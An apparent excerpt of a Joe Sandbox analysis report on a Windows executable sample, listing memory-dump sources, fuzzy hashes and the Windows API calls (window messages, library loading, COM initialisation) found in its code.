                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$Long
                                    • String ID: SysTreeView32
                                    • API String ID: 847901565-1698111956
                                    • Opcode ID: dbf99d262fb182d75e7012c3c54e2d338c9c578c64401c149cc107c8b9d2e154
                                    • Instruction ID: a8eb4fd4b96c27daedc21044b129a4429f638aae04b5427c67adb199c72a6491
                                    • Opcode Fuzzy Hash: dbf99d262fb182d75e7012c3c54e2d338c9c578c64401c149cc107c8b9d2e154
                                    • Instruction Fuzzy Hash: 1131AD36600249AFDB228E79CC41BEA7BA9FB89334F244715F975922E0D735EC518B90
                                    APIs
                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 009EA15E
                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 009EA172
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 009EA196
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window
                                    • String ID: SysMonthCal32
                                    • API String ID: 2326795674-1439706946
                                    • Opcode ID: 138aa164aafc780afe0f1355fadc6476e6eb0ab096e1ab8a754b74d992f29124
                                    • Instruction ID: 4d924590552698cd5971714c589affb3c81e96c0782e8f7f0fdb5c0ebab2bda9
                                    • Opcode Fuzzy Hash: 138aa164aafc780afe0f1355fadc6476e6eb0ab096e1ab8a754b74d992f29124
                                    • Instruction Fuzzy Hash: 2C217F32510218ABDF168F94CC82FEA3B7AEF88754F110214FA556B1E0D6B5BC55CB91
                                    APIs
                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 009EA941
                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 009EA94F
                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 009EA956
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$DestroyWindow
                                    • String ID: msctls_updown32
                                    • API String ID: 4014797782-2298589950
                                    • Opcode ID: 1e5596bac8fafb8cca31cf0dddc2370a00aa2a4f9f3ea26659840ef79a7380bc
                                    • Instruction ID: bddeb1a4e4b42c1b106e4bc5ad7115b386d21649f8ece297de0a5dd57b1f6acf
                                    • Opcode Fuzzy Hash: 1e5596bac8fafb8cca31cf0dddc2370a00aa2a4f9f3ea26659840ef79a7380bc
                                    • Instruction Fuzzy Hash: BB21B0B5200209AFDB11DF69CC81D7777ADEB8A3A4B050059FA049B3A2CB31FC128B61
                                    APIs
                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 009E9A30
                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 009E9A40
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 009E9A65
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$MoveWindow
                                    • String ID: Listbox
                                    • API String ID: 3315199576-2633736733
                                    • Opcode ID: 4ad6d323f9fcc976451f9fc877e10887aac1a937e5a15eaac58283868ee55e1a
                                    • Instruction ID: ba89e842a0965f757f3a3daefd92fa3903235158875f7f85f1eaaf0dcc76fa12
                                    • Opcode Fuzzy Hash: 4ad6d323f9fcc976451f9fc877e10887aac1a937e5a15eaac58283868ee55e1a
                                    • Instruction Fuzzy Hash: 6F21D432610158BFDF228F55CC85FBB3BAEEF89750F018129F9549B1A0C6719C52C7A0
                                    APIs
                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009EA46D
                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009EA482
                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 009EA48F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: msctls_trackbar32
                                    • API String ID: 3850602802-1010561917
                                    • Opcode ID: fb94299566efefffaed64135c0eaaea9750883adc3e1776b6e20aa377b50f363
                                    • Instruction ID: 6c1576a732de324e2278dbfce66844469d26edd88f7f19df595c36f13d6ae18c
                                    • Opcode Fuzzy Hash: fb94299566efefffaed64135c0eaaea9750883adc3e1776b6e20aa377b50f363
                                    • Instruction Fuzzy Hash: 6F11C471200248BAEF259F66CC45FAB776DEF89754F014118FA45960F1E2B2E811C720
                                    APIs
                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 009A22A1
                                    • GetProcAddress.KERNEL32(00000000), ref: 009A22A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: RoInitialize$combase.dll
                                    • API String ID: 2574300362-340411864
                                    • Opcode ID: 4afe3e877d05d458876924a0d53863a6a47bde03b1785ad6d6539509b9ec7be8
                                    • Instruction ID: fe114edb0c7212c1b64062de15b35653a59d4ebb0ffce78ae2fca2dc5745c9e5
                                    • Opcode Fuzzy Hash: 4afe3e877d05d458876924a0d53863a6a47bde03b1785ad6d6539509b9ec7be8
                                    • Instruction Fuzzy Hash: 2DE01A796A0304ABEB20DFF8ED4DF143668B756702F004520B642D50E0CBB64053DF04
                                    APIs
                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,009A2276), ref: 009A2376
                                    • GetProcAddress.KERNEL32(00000000), ref: 009A237D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: RoUninitialize$combase.dll
                                    • API String ID: 2574300362-2819208100
                                    • Opcode ID: d4fa2c1b40f789918f4d7d1e52db57cdff8346047fbfeb95cf9b8145cb1cd25a
                                    • Instruction ID: 31b9492fe64a68ed9a3f67a6d648b239b4c2bfd8f8582445f76cc4c1f0273074
                                    • Opcode Fuzzy Hash: d4fa2c1b40f789918f4d7d1e52db57cdff8346047fbfeb95cf9b8145cb1cd25a
                                    • Instruction Fuzzy Hash: 93E0B679645304ABDB20EFE8ED0DF043A69B767B06F200514F24AD20B0CBBA9412AA14
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: LocalTime__swprintf
                                    • String ID: %.3d$WIN_XPe
                                    • API String ID: 2070861257-2409531811
                                    • Opcode ID: cf47b7c8850b71984c8208dc4558f1e0605e682226d0e1631fbb6d16299e8778
                                    • Instruction ID: f4a3c9752a2ed33c3d2e45aaf1b60b18b767c4cb3c302cc817b0cf72c16a7d33
                                    • Opcode Fuzzy Hash: cf47b7c8850b71984c8208dc4558f1e0605e682226d0e1631fbb6d16299e8778
                                    • Instruction Fuzzy Hash: BBE012F180561CEBCB51D790CD45DFA737CA708741F100892FA8AA1000D63D9B95AB12
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,009842EC,?,009842AA,?), ref: 00984304
                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00984316
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                    • API String ID: 2574300362-1355242751
                                    • Opcode ID: 2470cb0bfa4cf44240ee35063fbdb34ad2092c20be15bdf1719e93172eabc26a
                                    • Instruction ID: 2804eae11e63a6cdf5dc77719092a106025b2355144583099518b1b6bc138a9c
                                    • Opcode Fuzzy Hash: 2470cb0bfa4cf44240ee35063fbdb34ad2092c20be15bdf1719e93172eabc26a
                                    • Instruction Fuzzy Hash: 2ED0C772544717AFD720AFA5F80D741B6D8BF14711F10895AF555D2264DBB0C8818750
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,009E21FB,?,009E23EF), ref: 009E2213
                                    • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 009E2225
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetProcessId$kernel32.dll
                                    • API String ID: 2574300362-399901964
                                    • Opcode ID: bebd2bd9204270b25b065af817f4465bf154af1c97a5d6d2e214c5e0dc278e93
                                    • Instruction ID: 5b6b0131e9b847ac79e0afc22dc468d1071ca1c70287b67b847e0e7da384a38e
                                    • Opcode Fuzzy Hash: bebd2bd9204270b25b065af817f4465bf154af1c97a5d6d2e214c5e0dc278e93
                                    • Instruction Fuzzy Hash: F1D0A736800716AFC7269FB1F808601B6DCFB0C301F104819F852E2250DB70DC818760
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,009841BB,00984341,?,0098422F,?,009841BB,?,?,?,?,009839FE,?,00000001), ref: 00984359
                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0098436B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                    • API String ID: 2574300362-3689287502
                                    • Opcode ID: e7424bd19ed1623ae404568e21acb9f7f2f15a0b0b6e4c253ec7d3ed0c0694c9
                                    • Instruction ID: 1835106bd3f34d262edc21a743e2aa2c6a30bf676b9bd655de841806f8e69cbd
                                    • Opcode Fuzzy Hash: e7424bd19ed1623ae404568e21acb9f7f2f15a0b0b6e4c253ec7d3ed0c0694c9
                                    • Instruction Fuzzy Hash: DCD0C772544717BFD720AFF5E809741B6D8BF14715F10496AF496D2250EBB0D8818750
                                    APIs
                                    • LoadLibraryA.KERNEL32(oleaut32.dll,?,009C051D,?,009C05FE), ref: 009C0547
                                    • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 009C0559
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: RegisterTypeLibForUser$oleaut32.dll
                                    • API String ID: 2574300362-1071820185
                                    • Opcode ID: 6458ceb70d3b34f95a2982c17773e04369f8bc565a10eeaa9024f042f6864bdf
                                    • Instruction ID: ab2ddc5efcc148aaaf3d81dce8496a87e0dbcbc065730a65941a9b4adba1653c
                                    • Opcode Fuzzy Hash: 6458ceb70d3b34f95a2982c17773e04369f8bc565a10eeaa9024f042f6864bdf
                                    • Instruction Fuzzy Hash: FFD0C771944716EFD720DFA5E808B41B6E8BB54711F10C91DF596D2250DA70C8818B51
                                    APIs
                                    • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,009C052F,?,009C06D7), ref: 009C0572
                                    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 009C0584
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                    • API String ID: 2574300362-1587604923
                                    • Opcode ID: 64076779d19cb1fec165534f10cb28a74b44385baf3fa88851d31c32abc9c983
                                    • Instruction ID: bc152a1b21c30e85adc20d5ef0b8b3af38288bd593f2cbb438ea42f6525110cd
                                    • Opcode Fuzzy Hash: 64076779d19cb1fec165534f10cb28a74b44385baf3fa88851d31c32abc9c983
                                    • Instruction Fuzzy Hash: 35D0C771944716EFDB209FB5E809F42B7E8BB44711F108A1DF855D2150DB70D4C18B61
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,009DECBE,?,009DEBBB), ref: 009DECD6
                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 009DECE8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                    • API String ID: 2574300362-1816364905
                                    • Opcode ID: 1c1cf126a814dce317ca24c0d52ba9d345bcfeed1c4c43c4e7fa3c57a164ca1c
                                    • Instruction ID: 79f04d5133e88eef0bf619b38d07b070cc774b433db98c0ce2f3e3a89bf5662e
                                    • Opcode Fuzzy Hash: 1c1cf126a814dce317ca24c0d52ba9d345bcfeed1c4c43c4e7fa3c57a164ca1c
                                    • Instruction Fuzzy Hash: 2AD0A731450723AFCB20AFF0E848702BAF8BB04300F10C82AF885D2250DF70D8818750
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,009DBAD3,00000001,009DB6EE,?,00A1DC00), ref: 009DBAEB
                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 009DBAFD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetModuleHandleExW$kernel32.dll
                                    • API String ID: 2574300362-199464113
                                    • Opcode ID: 4c31cb38d7f3ec1571c08e86a09ea485ff78ae8e7ef689bb4cf42add7e63bb14
                                    • Instruction ID: c6071d56c58064cc046e6f9f827a2a9f877316d8bad0745fc80a8b09966bd7ea
                                    • Opcode Fuzzy Hash: 4c31cb38d7f3ec1571c08e86a09ea485ff78ae8e7ef689bb4cf42add7e63bb14
                                    • Instruction Fuzzy Hash: C4D0A731940712EFC7309FA1F849B15B6D8BB05300F11881BF843D2254DB74D881C750
                                    APIs
                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,009E3BD1,?,009E3E06), ref: 009E3BE9
                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 009E3BFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                    • API String ID: 2574300362-4033151799
                                    • Opcode ID: 571af57b1a5f97cf5fe8dfe70dcaa99fcfa939190e4407b7129132c72285340c
                                    • Instruction ID: 1147cd17505ced4a092d60e47cee39493fb32d1fce30acf73036bf8ec80665f6
                                    • Opcode Fuzzy Hash: 571af57b1a5f97cf5fe8dfe70dcaa99fcfa939190e4407b7129132c72285340c
                                    • Instruction Fuzzy Hash: F0D09EB1500756EBD7219FE5E809642BBA8AB09715F208919E895A2150DBB4DC818E50
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 89e451635de99195bde90aea27ccb20da890645dffd18702ef951e7b99a34d37
                                    • Instruction ID: abd2eb683633ae745717f86b5aae3eddf91daf31f9b9889e362d515acf801f19
                                    • Opcode Fuzzy Hash: 89e451635de99195bde90aea27ccb20da890645dffd18702ef951e7b99a34d37
                                    • Instruction Fuzzy Hash: 98C15E75A1021AEFCB14CF94C984BEEBBB5FF88710F108598EA45AB291D730DE41DB90
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 009DAAB4
                                    • CoUninitialize.OLE32 ref: 009DAABF
                                      • Part of subcall function 009C0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009C027B
                                    • VariantInit.OLEAUT32(?), ref: 009DAACA
                                    • VariantClear.OLEAUT32(?), ref: 009DAD9D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                    • String ID:
                                    • API String ID: 780911581-0
                                    • Opcode ID: 28384c90c10f122365069720b2aeb45f7fef5e3ffa0829d7e1ac6231b777cfaa
                                    • Instruction ID: f13202030c8f0b39af16868451bcfc41aeb6256848b6e04319af2b4fc360330a
                                    • Opcode Fuzzy Hash: 28384c90c10f122365069720b2aeb45f7fef5e3ffa0829d7e1ac6231b777cfaa
                                    • Instruction Fuzzy Hash: 2AA16D352447019FCB15EF64C881B2AB7E5BF88720F14884AF9969B3A1CB34FD05CB86
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Variant$AllocClearCopyInitString
                                    • String ID:
                                    • API String ID: 2808897238-0
